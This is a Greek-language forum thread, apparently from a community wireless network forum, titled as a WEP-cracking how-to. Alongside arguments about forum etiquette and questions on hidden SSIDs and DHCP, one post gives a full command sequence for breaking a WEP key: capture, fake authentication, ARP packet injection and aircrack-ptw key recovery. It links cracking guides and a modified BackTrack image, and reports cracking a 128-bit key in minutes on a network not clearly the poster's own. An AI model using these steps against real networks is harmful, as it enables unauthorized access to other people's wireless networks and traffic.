How To: Cracking WEP

[sotiris]

Αρχική απάντηση από bleo8onhs

Φίλε μου, επειδή διάβασα αρκετά θέματα, μέχρι να εξοικειωθώ με τις έννοιες των ασύρματων, είδα ότι σε οποιαδήποτε ερώτηση του στύλ, "help, θέλω να μοιραστώ την dsl μου με το γείτονα", ή και καλύτερα του στύλ "help, πως θα δικτυώσω 2 airlive με απόσταση 500μ" και μετά "πως θα κάνω δίκτυο μεταξύ του ρουτερ και του airlive", (ερωτήσεις που είχα και γώ αλλά προτίμησα να μην κάνω), η απάντηση ήταν, το δίκτυο έχει σχέση με το awmn?. Απ ότι κατάλαβα και στο εσωτερικό του υπάρχουν κλίκες που δρούν αυτόνομα. Εγώ είμαι της άποψης ότι εφόσον έχεις φόρουμ σχετικό με ασύρματα δίκτυα, θα πρέπει να βοηθάς όλο τον κόσμο. Δεν καταλαβαίνω την λογική του, υπάρχουμε για να εξυπηρετούμε μόνο το δίκτυό μας. Λειτουργείστε το φόρουμ μόνο εσωτερικά τότε. Τέλος πάντων. Δεν κατηγόρησα ούτε εσένα, ούτε κανέναν προσωπικά. Απλά γράφτηκα στο φόρουμ και μου δημιουργήθηκε αυτή η εντύπωση, χωρίς καν να κάνω πόστ.

Κάτι έχεις παρανοήσει, το forum αφορά ΤΟ ασύρματο δίκτυο (το AWMN) και όχι το δίκτυο του κάθε πικραμένου. Καλώς ή κακώς έχει κάποιους σκοπούς τόσο το δίκτυο όσο και οι συμμετέχοντες, αν νομίζεις ότι οι σκοποί αυτοί δεν συνάδουν με τις δικές σου φιλοδοξίες δεν νομίζω ότι σε υποχρεώνει κανείς να συμμετάσχεις. Παρ'όλ'αυτά, η γνώση παρέχεται ελεύθερα (βγαίνει και στο inet - το forum είναι και εσωτερικό προφανώς), βέβαια αυτό ίσως να μην είναι καλό, δες παρακάτω το γιατί. Πάντως το να περιμένεις να πάρεις βοήθεια ενώ θα προσφέρεις αέρα (ούτε καν μια ζεύξη για το δίκτυο) είναι -το λιγότερο- αχαριστία, πολλώ δε μάλλον όταν θα αποκομίσεις ιδίον όφελος.

Αρχική απάντηση από bleo8onhs

Κάνεις λάθος φίλε. Εφόσον συμμετέχεις σε ανοιχτή κοινότητα, είσαι εκεί για να βοηθάς όπως μπορείς. Δεν πρέπει να σε ενδιαφέρει ο σκοπός του άλλου. Είναι η ιστορία με το μαχαίρι που κόβει ψωμί αλλά σκοτώνει και ανθρώπους. Επίσης, όπως θα έχεις διαπιστώσει, είναι αρκετά δύσκολο να ψάξει κάποιος σε 50 θέματα με 50 ποστς το καθένα και από αυτά να μαζέψει 5 πράγματα που θα τον βοηθήσουν. Αν είχες ένα sticky όμως για κάθε συχνή ερώτηση, δεν θα είχες προβλήματα.

Όσο για την γνώση που μένει περιορισμένη στο δικό μου δίκτυο, δεν είναι γνώση, είναι προσωπικά δεδομένα, και το δίκτυο είναι φτιαγμένο μεταξύ γραφείου και σπιτιού, οπότε είναι για επαγγελματικούς λόγους. Αν εννοείς την γνώση της κατασκευής, όταν τελειώσω έχω σκοπό να γράψω ένα How To και για αυτό.

Όταν ο εθελοντισμός γίνεται με βάση την προαγωγή του κοινού καλού, την προώθηση της ελευθερίας της έκφρασης, της δυνατότητας για ανταλλαγή πληροφορίας και την παροχή γνώσης, είναι κάτι θετικό που βοηθά την ανθρωπότητα.

Όταν κάποιος απομυζεί αυτά που ο άλλος του προσφέρει εθελοντικά όχι για να βοηθήσει αυτόν που τον βοήθησε αλλά για ιδίον όφελος, τότε είναι ένα απλό κοινότυπο "leecher-όνι" γνώσης, ο οποίος -δυστυχώς- δεν εκτιμά αυτό που του προσφέρεται.

Το "κάνε το καλό και ρίχτο στο γυαλό" δεν είναι η συγκεκριμένη περίπτωση, διότι δυστυχώς το φάσμα είναι πεπερασμένο, και όταν ο κάθε πικραμένος παρτάκιας αποφασίζει το πώς θέλει να στέλνει τα δεδομένα του (π.χ. γιατί όχι 802.11g, γιατί όχι με full ισχύ κλπ.) κάποιοι θα στερηθούν το αγαθό της ελεύθερης μπάντας προς όφελος του παρτάκια (π.χ. γιατί θα έχουν "θόρυβο").

Και όπως είπε και ο trendy, στο κάτω κάτω της γραφής αν θέλεις επαγγελματική δουλειά, μπορείς πάντα να προσλάβεις κάποιον επαγγελματία. ’λλο επάγγελμα, άλλο χόμπυ, άλλες υποχρεώσεις το μεν, άλλες το δε (και ενδεχομένως, άλλες συχνότητες, πιθανώς να μην έπρεπε να επιτρέπεται εμπορική χρήση των 2.4 και 5.7 - προσωπική μου άποψη).

Hint: Τα άνωθεν δεν τα λέω για εσένα προσωπικά, είναι γενικότερες απόψεις

[iceblade]

Να ρωτήσω κάτι ίσως λίγο άσχετο, αν δεν κάνεις broadcast το SSID μπορεί να το βρεί ο άλλος;

[Shaman]

Αρχική απάντηση από iceblade

Να ρωτήσω κάτι ίσως λίγο άσχετο, αν δεν κάνεις broadcast το SSID μπορεί να το βρεί ο άλλος;

Εύκολα. Απλά είναι άλλο ένα στρώμα ασφάλειας (ικανό όμως να σε προστατέψει απο τον άσχετο γείτονα που τρέχει XP και κοιτάει "μπας και βρει κανένα wireless"), τίποτα παραπάνω.

[iceblade]

Αρχική απάντηση από Shaman [Σήμερα, στις 12:14]

Εύκολα. Απλά είναι άλλο ένα στρώμα ασφάλειας (ικανό όμως να σε προστατέψει απο τον άσχετο γείτονα που τρέχει XP και κοιτάει "μπας και βρει κανένα wireless"), τίποτα παραπάνω.

Thanx for the info

Καλό παρ όλα αυτά. Εγώ χρησιμοποιώ αυτό + WAP + MAC Address Filtering, τώρα αν κάποιος τα παρακάμψει και τα τρία μπράβο και ζήτω, του αξίζει να χρησιμοποιεί το δίκτυο μου τσάμπα

[lefteris]

Για βοηθείστε λίγο εδώ...

Κάνω μπουτ σε macbook, αλλά στο login έχω echo!

Αποτέλεσμα είναι να μην μπορώ να μπώ...

Για login καταλαβαίνει rroooott και για password το ίδιο γιατί βάζει και 2 enter...

[jpavly]

Αρχική απάντηση από lefteris [Σήμερα, στις 17:04]

Για βοηθείστε λίγο εδώ...

Κάνω μπουτ σε macbook, αλλά στο login έχω echo!

Αποτέλεσμα είναι να μην μπορώ να μπώ...

Για login καταλαβαίνει rroooott και για password το ίδιο γιατί βάζει και 2 enter...

Στην περίπτωση που ΔΕΝ το κατάλαβες, σκοπός του thread είναι να προστατευτεί ο κόσμος και όχι να γίνουν όλοι hijackers.

Οδηγίες και troubleshooting για το πως γίνεται, πρόβλημά σας είστε μόνοι σας.

Μη χαλάτε ένα καλό thread με δόλο.

Φυσικά μιλάω γενικά και όχι συγκεκριμένα. Δεν υπάρχει χώρος για προσωπικές παρεξηγήσεις.

[lefteris]

jpavly αυτό που δεν καταλαβαίνω είναι γιατί θεωρείς ότι μπορεί να μην κατάλαβα.

Πώς περιμένεις να προστατεύσω το δίκτυό μου, αν δεν δοκιμάσω να το "σπάσω" και να ελέγξω τα διάφορα επίπεδα ασφάλειας;

Αν θεωρείς ότι δεν θα έπρεπε να υπάρχει σε αυτό το φόρουμ το αρχικό μήνυμα, τότε δεν ευθύνομαι εγώ για το ότι δεν μπορώ να αναπαράγω τα γραφόμενά του.

Αν πάλι η ερώτησή μου δεν πρέπει να απαντηθεί εδώ, αλλά πρέπει να αναζητήσω απάντηση σε φόρουμ που αναφέρονται σε unix, αυτό είναι άλλο θέμα και δεν αρμόζει η δική σου απάντηση/επίθεση.

Αλλιώς να αλλάξει ο τίτλος του θέματος και να σβηστεί το "How To".

[astrolabos]

Μπορείς να αποφύγεις το thread hijack και να ανοίξεις κάποιο θέμα ζητώντας βοήθεια.

[naz]

εγω δεν καταλαβα ρε ψηλε αφου εκατσες και το εστησες το ρημαδι γιατι δεν κανεις τον κοπο να ασχοληθεις αλλες 2 μερες και να γινεις και εσυ μελος του κοινοφελους μη κερδοσκοπικου δυκτιου που καλειτε awmn και ερχεται σφηνα σε μια εποχη οπου για ολα θα πρεπει να δινεις λογο και στην τελικη θα πληρωνεις για αμφιβολες υπηρεσιες....

τα παιδια εκει εχουν στησει κατι πρωτοφανες για τα παγκοσμια δεδομενα,η γνωση δε που μπορει να λαβεις ειναι συναρτηση του ελευθερου σου χρονου και μονο,αν με νοεις...

προς θεου δεν λεω οτι ολα ειναι μελι γαλα,αλλα ζυγιζοντας παντα τα θετικα και τα αρνητικα δεν ειναι δυσκολο να καταλαβεις οτι βγαζοντας εναν κομβο συνεισφερεις και παραλληλα καρπωνεσαι τα πλεονεκτηματα ενος πολυ μεγαλου και ανοιχτου δυκτιου με οτι συνεπαγεται αυτο.

το φορουμ του awmn αφορα οπως πολυ σωστα ειπωθηκε τα του awmn και καλο θα ηταν να εχει διαβασει καποιος τουλαχιστον το plug me in για να προχωρησει εκει easy n safe.η εντυπωση που αποκομισες ειναι αποτελεσμα δυστυχως εκατονταδων ισως και χιλιαδων ποστ του τυπου : 1to ποστ,αγορασα λαπτοπ και βλεπω εναν awmn 23242 αλλα δεν με αφηνει να μπω...help!!

......κραξιμο

η 2ρο ποστ:εχω μαι εταιρεια με 12 pc και θελω να συνδεθει με μια πολυκατοικια στα 2 χιλιομετρα.....κρακρα κρα

κοκ

οποτε οπως καταλαβαινεις σε ενα τετοιο φορουμ,οπου το βαζο με το μελι ειναι μεγαλο και ολοι ερχονται με τα φτυαρακια τους να φανε λιγο,τα πνευματα ειναι παντα τεταμενα.

παραυτα μην δινεις πολυ βαση,υπαρχουν ατομα πολυ σωστα,με θεληση να βοηθησουν χωρις κανενα αντιτημο για τους ιδιους και ουσιαστικα αυτοι ειναι που κρατανε τις ισορροπιες ...

[flyboy]

Αρχική απάντηση από lefteris

Για βοηθείστε λίγο εδώ...

Κάνω μπουτ σε macbook, αλλά στο login έχω echo!

Αποτέλεσμα είναι να μην μπορώ να μπώ...

Για login καταλαβαίνει rroooott και για password το ίδιο γιατί βάζει και 2 enter...

Αν πήγαινες στη σελίδα του backtrack και έβλεπς τα bugs θα διάβαζες ότι στα macbook ότι πατάς το παίρνει δύο φορές.

[bleo8onhs]

Αν και καταλαβαίνω ότι οι απόψεις σας είναι γενικές και ελπίζω να το εννοείτε όταν λέτε ότι δεν απευθυνεστε σε εμένα θα προσπαθήσω να δικαιολογηθώ λέγοντας ότι το δίκτυο δεν έχει καμία σχέση με την Αθήνα, βρίσκεται στο Αιτωλικό, οπότε δεν θα μπορούσε να προσφέρει τίποτα στο awmn, επίσης θα σας πω ότι με δικά μου έξοδα στήνω bblink για να δικτυωθεί το Αγρίνιο με το Αιτωλικό και το Μεσολόγγι (ή σκέτο το Αιτωλικό με το Μεσολόγγι, αφού μπορεί να γίνει απευθείας ζεύξη Αγρινίου-Μεσολογγίου), και μετά με την Πάτρα, συνδέοντας την δυτική Ελλάδα αφού τα παιδιά στο Αγρίνιο έχουν κάνει μεγάλη προσπάθεια, για την Πάτρα δεν συζητάμε, τα παιδιά προτίθενται να έρθουν και να δανείσουν εξοπλισμό μέχρι να γίνει μόνιμη η εγκατάσταση. Οπότε κάτι προσφέρω και γώ στο σύνολο.

Εγώ εκλαμβάνω το forum και βασικά τους χρήστες του forum, ως άτομα σοβαρά.Από αυτούς δε που ξεχωρίζουν λόγω των γνώσεων τους, περιμένω να μην ανακατεύονται με μικροπρέπειες και να ρωτάνε το σκοπό της ερώτησης που κάνει ο καθένας. Εγώ μπορεί να γουστάρω να δικτυώσω το σπίτι μου με το γείτονα για να παίρνω ίντερνετ τσάμπα, μπορεί να θέλω να κάνω hotspot και να πουλάω ίντερνετ. Περιμένω από σας, να μην ανακατευθείτε με αυτό καθόλου. Τι σας νοιάζει στην τελική? Εδώ δεν είστε για να βοηθήσετε και να βοηθηθείτε? Τι σας απασχολεί τι θέλει να κάνει ο άλλος? Και οι επαγγελματίες τι θα κάνουν ε? Την επόμενη φορά που θα χρειαστείτε φορματ, μην το κάνετε μόνοι σας, πηγαίντε στο Πλαίσιο...

Προφανώς γράφω σε δεύτερο πληθυντικό απευθυνόμενος στο σύνολο του φόρουμ και όχι στους trendy, sotiris. Επίσης θα προτιμούσα αν είναι να συνεχιστεί η κουβέντα, να την κάνουμε σε άλλο θέμα, και όχι εδώ, αφού δεν πολυέχει σχέση με το θεμα.

Μήπως θα ήταν συνετό, να πειράξω τις εντολές, δείχνοντας έτσι την ευκολία με την οποία σπάει το WEP, αλλά αποφεύγοντας τους επίδοξους crackers? Γιατί μου έστειλαν και μένα pm και σχετικά με cracking ασύρματων δικτύων όπως της Αθήνας και της Θεσσαλονίκης.

EDIT:

Αρχική απάντηση από iceblade

Να ρωτήσω κάτι ίσως λίγο άσχετο, αν δεν κάνεις broadcast το SSID μπορεί να το βρεί ο άλλος;

To kismet στο βρίσκει ας μην κάνεις broadcast.

[lefteris]

Αρχική απάντηση από NickL [Σήμερα, στις 18:38]

Αν πήγαινες στη σελίδα του backtrack και έβλεπς τα bugs θα διάβαζες ότι στα macbook ότι πατάς το παίρνει δύο φορές.

Ευχαριστώ NickL!

[trendy]

Αρχική απάντηση από bleo8onhs [Σήμερα, στις 19:06]

Αν και καταλαβαίνω ότι οι απόψεις σας είναι γενικές και ελπίζω να το εννοείτε όταν λέτε ότι δεν απευθυνεστε σε εμένα θα προσπαθήσω να δικαιολογηθώ λέγοντας ότι το δίκτυο δεν έχει καμία σχέση με την Αθήνα, βρίσκεται στο Αιτωλικό, οπότε δεν θα μπορούσε να προσφέρει τίποτα στο awmn, επίσης θα σας πω ότι με δικά μου έξοδα στήνω bblink για να δικτυωθεί το Αγρίνιο με το Αιτωλικό και το Μεσολόγγι (ή σκέτο το Αιτωλικό με το Μεσολόγγι, αφού μπορεί να γίνει απευθείας ζεύξη Αγρινίου-Μεσολογγίου), και μετά με την Πάτρα, συνδέοντας την δυτική Ελλάδα αφού τα παιδιά στο Αγρίνιο έχουν κάνει μεγάλη προσπάθεια, για την Πάτρα δεν συζητάμε, τα παιδιά προτίθενται να έρθουν και να δανείσουν εξοπλισμό μέχρι να γίνει μόνιμη η εγκατάσταση. Οπότε κάτι προσφέρω και γώ στο σύνολο.

Δεν καταλαβαίνω ποιο είναι το πρόβλημά σου από τη στιγμή που ήδη συμμετέχεις σε μία κοινότητα. Σου αρνήθηκε κανένας βοήθεια; Στο forum του awmn φιλοξενούνται και ενότητες από άλλες ασύρματες κοινότητες που δεν έχουν ή δεν είχαν στο παρελθόν δική τους σελίδα.

Αρχική απάντηση από bleo8onhs [Σήμερα, στις 19:06]

Εγώ εκλαμβάνω το forum και βασικά τους χρήστες του forum, ως άτομα σοβαρά.Από αυτούς δε που ξεχωρίζουν λόγω των γνώσεων τους, περιμένω να μην ανακατεύονται με μικροπρέπειες και να ρωτάνε το σκοπό της ερώτησης που κάνει ο καθένας. Εγώ μπορεί να γουστάρω να δικτυώσω το σπίτι μου με το γείτονα για να παίρνω ίντερνετ τσάμπα, μπορεί να θέλω να κάνω hotspot και να πουλάω ίντερνετ. Περιμένω από σας, να μην ανακατευθείτε με αυτό καθόλου. Τι σας νοιάζει στην τελική? Εδώ δεν είστε για να βοηθήσετε και να βοηθηθείτε? Τι σας απασχολεί τι θέλει να κάνει ο άλλος?

Δεν είναι μικροπρέπεια να θέλεις η γνώση σου να διοχετευτεί στα άτομα που την έχουν ανάγκη γιατί ενστερνίζεστε το ίδιο χόμπυ, και όχι στον τυχάρπαστο που θέλει απλώς να γλυτώσει μερικά με μηδενικό κόπο, αυτό είναι για μένα μικροπρέπεια. Επίσης δε θέλω να μεταδώσω τη γνώση μου σε κάποιον με άμεσο σκοπό να βγάλει λεφτά. Για ποιο λόγο να μη μου ζητήσει να το κάνω εγώ που μπορώ και ξέρω καλύτερα από αυτόν και να βγάλω εγώ τα λεφτά;

Είναι σαν την άδεια του Ελεύθερου λογισμικού, σου παρέχει κάτι δωρεάν με κάποιες προϋποθέσεις. Μία προϋπόθεση είναι αν αλλάξεις-διορθώσεις-βελτιώσεις κάτι να το επιστρέψεις στην κοινότητα. Έτσι και εδώ θέλουμε η γνώση μας που θα μεταλαμπαδευτεί σε κάποιον νέο να επιστρέψει αργότερα στην κοινότητα από τον ίδιο νέο που ασχολήθηκε και ανέπτυξε το δίκτυο και προχώρησε το δίκτυο ένα σκαλί πιο πάνω. Ενώ με το να πεις σε κάποιον πώς να συνδεθεί με τους γείτονές του δεν έχεις κάποιο κέρδος, μόλις παίξει θα εξαφανιστεί και θα εμφανιστεί πάλι όταν έχει πρόβλημα. Μόνο που εμείς δεν πληρωνόμαστε για να κάνουμε helpdesk στον κάθε ένα, κάνουμε το χόμπυ μας.

Αρχική απάντηση από bleo8onhs [Σήμερα, στις 19:06]

Και οι επαγγελματίες τι θα κάνουν ε? Την επόμενη φορά που θα χρειαστείτε φορματ, μην το κάνετε μόνοι σας, πηγαίντε στο Πλαίσιο...

Προφανώς γράφω σε δεύτερο πληθυντικό απευθυνόμενος στο σύνολο του φόρουμ και όχι στους trendy, sotiris. Επίσης θα προτιμούσα αν είναι να συνεχιστεί η κουβέντα, να την κάνουμε σε άλλο θέμα, και όχι εδώ, αφού δεν πολυέχει σχέση με το θεμα.

Είναι λάθος το παράδειγμά σου. Εγώ που ξέρω από φορμάτ το κάνω μόνος μου, κάνω και ένα οδηγό στο φόρουμ του thelab.gr για το πώς γίνεται το φορμάτ. Αν μπει ο νέοπας και ανοίξει thread "Πώς γίνεται το φορμάτ", ενώ ήδη υπάρχει οδηγός, τον ενημερώσουμε για τον οδηγό, μας πει ότι βαριέται να το διαβάσει γιατί διάβασε 5 γραμμές και του φάνηκαν κινέζικα, ε τότε θα τον στείλουμε στο Πλαίσιο.

Αν εξακολουθείς να διαφωνείς σε αυτά που λέμε, καλύτερα να μεταφερθεί η ενότητα κάπου αλλού να μη χαλάμε το thread σου.

Αρχική απάντηση από bleo8onhs [Σήμερα, στις 19:06]

Μήπως θα ήταν συνετό, να πειράξω τις εντολές, δείχνοντας έτσι την ευκολία με την οποία σπάει το WEP, αλλά αποφεύγοντας τους επίδοξους crackers? Γιατί μου έστειλαν και μένα pm και σχετικά με cracking ασύρματων δικτύων όπως της Αθήνας και της Θεσσαλονίκης.

Δε χρειάζεται, το δίκτυο της Αθήνας δε χρησιμοποιεί wep στα links του. Επιβαρύνει τον επεξεργαστή και δε χρειάζεται για την πλεονότητα των data που μεταφέρονται. Όποιος θέλει ασφάλεια τη χρησιμοποιεί μόνο στο flow που χρειάζεται.

Τέλος το ssid υπάρχει σε κάθε πακέτο που στέλνεται στο ασύρματο, οποιοσδήποτε sniffer μπορεί να το βρει.

[papatsonis]

μερικα links για αναφορα/προσθηκη, στο ψαξιμο για να ξεπερασω καποια προβληματακια που μου προεκυψαν :

1) http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

2) http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase

3) http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/

4) http://forums.remote-exploit.org/showpost.php?p=25635&postcount=14

5) http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_via_a_wireless_client

6)http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients&DokuWiki=776dbcfe98a46cf33966551521be6c99

τo 1ο) λεει πανω-κατω, τα ιδια με τον υπαρχον οδηγο + το κατατοπιστικο "step 3" που δεν περιεχεται στον οδηγο εδω.

το 2ο) μου ελυσε την απορια και το προβλημα που ειχα με τα μυνηματα του τυπου :

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

Read 17915 packets (got 3 ARP requests), sent 5854 packets...

που ειχα με τo aireplay.(θα μπορουσα να το ειχα αποφυγει αν ειχα διαβασει καλυτερα στο 1) λινκ, το step 3.)

το 3ο) ειναι μια υλοποιηση μιας νεας πολυ πιο αποδοτικης μεθοδου ανευρεσης του κλειδιου.

το 4) λεει ποια αρχεια πρεπει να τροποποιησουμε στο ISO του BT2, ωστε να χρησιμοποιησουμε το νεοτερο τροπο "σπασιματος" .

το 5) (αχρειαστο να ειναι..) ειναι για τις περιπτωσεις καποιων ΑΡ , που εχουν επιλογη να απομονωνουν τους wireless clients μεταξυ τους.

το 6) (αχρειαστο και αυτο) ειναι για περιπτωσεις που δεν ειναι κανεις client συνδεδεμενος στο ΑΡ και.. εχει καιρο να φανει (ή ειμαστε απλως ανυπομονοι )

Λίγο zip-αρισμα τώρα..

Συνοπτικα , εφοσον ξερουμε τα : δικη μας MAC adress, ssid,channel,bssid, wireless interface (βλπ. αρχη thread.Τη δικη μας ΜΑC τη βλεπουμε με το ifconfig) κανουμε τα εξης βηματα :

1) airodump-ng -c <channel> --bssid <bssid> -w output <wireless interface>

Σημ. παραλειπουμε την παραμετρο --ivs , γιατι με το καινουργιο aircrack , χρειαζεται να καταγραφει ΟΛΟ το πακετο και οχι μονο το IV.

αφου ξεκινησει να καταγραφει κινηση , τρεχουμε

2) aireplay-ng -1 0 -e <ssid> -a <bssid> -h <δικη μας MAC address> <wireless interface>

μολις τελειωσει και δειξει Association successfull ,ξεκιναμε το packet injection

3) aireplay-ng -3 -b <bssid> -h <δικη μας MAC address> <wireless interface>

μολις δειξει "got ... ARP requests" και ξεκινησουν να εκτοξευονται τα πακετα , καλο ειναι να σταματησουμε και να ξαναξεκινησουμε το airodump ωστε να γραψει ενα νεο αρχειο με μονο arp requests/responses (μπορει και να μη χρειαζεται αυτο, απλως ενστικτωδως το εκανα για να εχω ενα "pure" αρχειο ) ->

3b) airodump-ng -c <channel> --bssid <bssid> -w output <wireless interface>

Τωρα σχεδον τελειωσαμε.. μολις ξεπερασουν τα 20-30k πακετα.. (ναι .. σε 1-1.5 λεπτο λογικα.. ) ανοιγουμε μια ακομη κονσολα και γραφουμε

ls -la output*.cap

το αρχειο με το το μεγαλυτερο νουμερο -ΧΧ (output-ΧΧ.cap) ειναι το αρχειο που θα αναζητησουμε το κλειδι(το μεγαλυτερο σε μεγεθος λογικα..).Ετσι πληκτρολογουμε

4) aircrack-ptw output-XX.cap

και ειτε θα μας βρει πολυ γρηγορα το κλειδι , ειτε δε θα βρει τπτ(και αυτο γρηγορα ).Περιμενετε λιγα δεπτερολεπτα ακομη και ξαναπροσπαθηστε.

Ενδεικτικα ενα δικτυο που δοκιμασα προχθες, και σπαμαρα συνεχεια το 4) για να δω με ποσα πακετα θα το βρει , το βρηκε με 44000κατι πακετα , 128bit KEY !!! , σε A64 3200+ το πεταγε σχεδον instant το κλειδι.Πραγματικα ΔΕΝ πιστευα οτι ενα WEP σπαει ΤΟΣΟ γρηγορα!!! Στο συγκεκριμενο δικτυο με 4 κονσολες ανοιγμενες και τις εντολες πληκτρολογημενες, απο το 1ο) "enter" μεχρι να βρει το key ,δε θα πηρε πανω απο 3 λεπτα!!! (με ελαχιστη κινηση τα αλλα clients, μονο fake authentication με μενα).

Υ.Γ.> περεταιρω επεξηγησεις , γιατι/πως/ειδικες περιπτωσεις , κ.λ.π. , στα 5 πρωτα links

Υ.Γ.2> μπορουσα να συμπληρωσω απλως το 3) και το 4) αλλα προτιμησα να τα βαλω παλι ολα μαζι για να ειναι συγκεντρωμενα.

EDIT> προστεθηκε το λινκ(6) που περιγραφει την περιπτωση να μην ειναι κανενας client συνδεδεμενος(too lazy to translate it:p)

[voudas]

χμμμ ωραίος... πάλι διαβασμα...

το λινκ με το αρχείο που προσθέτεις στο iso δεν ισχύει... μπορείς να το ανεβάσεις κάπου? ή είναι απλά το ptw?

[papatsonis]

μολις τωρα το ξανατσεκαρα και μου ανοιγει κανονικα ,απλως σε βαζει σε ουρα οτι εχει και καλα κινηση (λεμε τωρα..) για να ψηθεις για premium account ,μετα απο 2-3 λεπτα μου εβγαλε και το download link.

Το aircrack-ptw και το (τροποποιημενο ?) root.lzm εχει

BT2_aircrack-ptw

[Jaco]

Σε προσωπικό δίκτυο με ένα το πολύ δυο χρήστες είναι σχετικά εύκολο να καταλάβεις ότι κάτι δεν πάει καλά... οπότε και να στο περάσουν το AP το καταλαβαίνεις σχετικά γρήγορα, από τα log το traffic κτλ... Τα προβλήματα είναι στις εταιρίες που οι περισσότεροι άσχετοι από pc και δίκτυα δεν μπορούν να καταλάβουν το ύποπτα disconnections κτλ...

όσο για κάποιους που είπανε ότι δεν βοηθούνται από το awmn, δεν είναι η απόλυτη πηγή γνώσεων στα wi-fi, όποιος έχει πρόβλημα το internet έχει εκατομμύρια how-to, σελίδες και forum που βρίσκεις τα πάντα και καλύτερα... απλά κάντε σωστό search και μην περιμένετε έτοιμες απαντήσεις από πουθενά, αλλιώς δεν μαθένετε...

[stefanos_79]

Εχω να κανω μια ερώτηση.Εστω οτι καποιος μπαινει στο router μου και εκμεταλευεται την συνδεση μου εγώ δεν μπορω να τον δω ως dhcp client?

[trendy]

Αν έχει πάρει dhcp settings.

[stefanos_79]

Αρχική απάντηση από trendy [Χθες, στις 08:30]

Αν έχει πάρει dhcp settings.

Δηλαδη αν βάλει χειροκινητα ip δεν μπορω να τον δω?